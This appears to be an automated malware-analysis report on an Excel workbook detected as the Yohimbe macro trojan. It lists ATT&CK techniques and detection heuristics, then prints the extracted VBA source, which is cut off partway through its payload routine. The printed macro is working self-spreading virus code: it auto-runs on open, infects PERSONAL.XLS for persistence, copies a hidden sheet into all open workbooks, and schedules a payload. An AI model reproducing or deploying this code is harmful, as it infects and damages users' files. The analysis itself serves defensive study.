Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The file is an Excel document containing a VBA macro with an Auto_Open subroutine, identified by ClamAV as the Yohimbe trojan. The macro attempts to infect the PERSONAL.XLS workbook, a common technique for establishing persistence, since Excel loads that workbook on every start. The explicit mention of 'Yohimbe' in the script together with the ClamAV detection strongly suggests this family.
Heuristics (3)
- ClamAV: Xls.Trojan.Yohimbe-2 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Trojan.Yohimbe-2
- VBA macros detected (medium, 1 related finding) OLE_VBA_MACROS: Document contains VBA macro code
- Auto_Open macro (high) OLE_VBA_AUTO: Auto_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5045 bytes |

SHA-256: 86ac77d7768e11a9a6c4eaa882ca63c5e0e6baf36fee2d9b9b85a4a37b3405b8
Detection: ClamAV: Xls.Trojan.Yohimbe-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Modul 1"
The YohimBe Virus
~~~ ~~~~~~~ ~~~~~
Here 's the Excel Macro Virus Yohimbe for you... I have disassembled it so you can see
what is going on!
MACRO Auto_Open
Sub Auto_Open()
On Error GoTo FixIt 'Errorhandler
'Set up infected book as a variable
Dim SaveBook As String
SaveBook = ActiveWorkbook.Name
Application.ScreenUpdating = False 'Don't want to see it working
' Check Personal.xls for prior infection
Windows("PERSONAL.XLS").Visible = True
If SheetExists("Exec") Then
Windows("PERSONAL.XLS").Visible = False
GoTo AlreadyInfected
Else
' Infect Personal.xls
Workbooks(SaveBook).Activate
Sheets("Exec").Visible = True
Sheets("Exec").Select
Sheets("Exec").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
Workbooks("PERSONAL.XLS").Activate
ActiveWorkbook.Sheets("Exec").Visible = False
ActiveWindow.Visible = False
Workbooks("PERSONAL.XLS").Save
AlreadyInfected: ' Return to originally opened book
Workbooks(SaveBook).Activate
ActiveWorkbook.Sheets("Exec").Visible = False
End If
GoTo OhKay
FixIt: ' In case of error infect everything that's open
DipDing
End
OhKay: ' Set time to infect all open books
Application.OnTime EarliestTime:=TimeValue("4:00 PM"), _
Procedure:="DipDing"
End Sub
MACRO DipDing
Sub DipDing() ' Routine to infect all open books
On Error GoTo DipFix ' Set up error handler
Application.ScreenUpdating = False
Dim book As Object
Dim CurrBook As String
CurrBook = ActiveWorkbook.Name
'Check each open book for infection, infect if not already infected
For Each book In Workbooks
book.Activate
If SheetExists("Exec") Then
GoTo Done
Else
Windows("PERSONAL.XLS").Visible = True
Windows("PERSONAL.XLS").Activate
Sheets("Exec").Visible = True
Sheets("Exec").Copy Before:=book.Sheets(1)
Sheets("Exec").Visible = False
ActiveSheet.PageSetup.RightHeader = "Yohimbe"
book.Save
Done:
End If
Next book
'Cover your tracks
Windows("PERSONAL.XLS").Activate
Sheets("Exec").Visible = False
Windows("PERSONAL.XLS").Visible = False
Workbooks(CurrBook).Activate
Application.OnTime EarliestTime:=TimeValue("4:45 PM"), _
Procedure:="PayLoad"
DipFix:
End Sub
Function SheetExists(sName As String) As Boolean 'Infection checker function
Dim aSheet As Object
SheetExists = False
For Each aSheet In ActiveWorkbook.Sheets
If (StrComp(aSheet.Name, sName, 1) = 0) Then
SheetExists = True
End If
Next aSheet
End Function
MACRO PayLoad
Sub PayLoad()
Cells.Select
Range("B1").Activate
Selection.RowHeight = 15
Selection.ColumnWidth = 2.5
Range("B9,C10,D11,D12,E13,F14,F15,G15,H15,I15,J15,K15,L15,M15,M14,N13,N12,N11,N10,N9,N8,
... (truncated)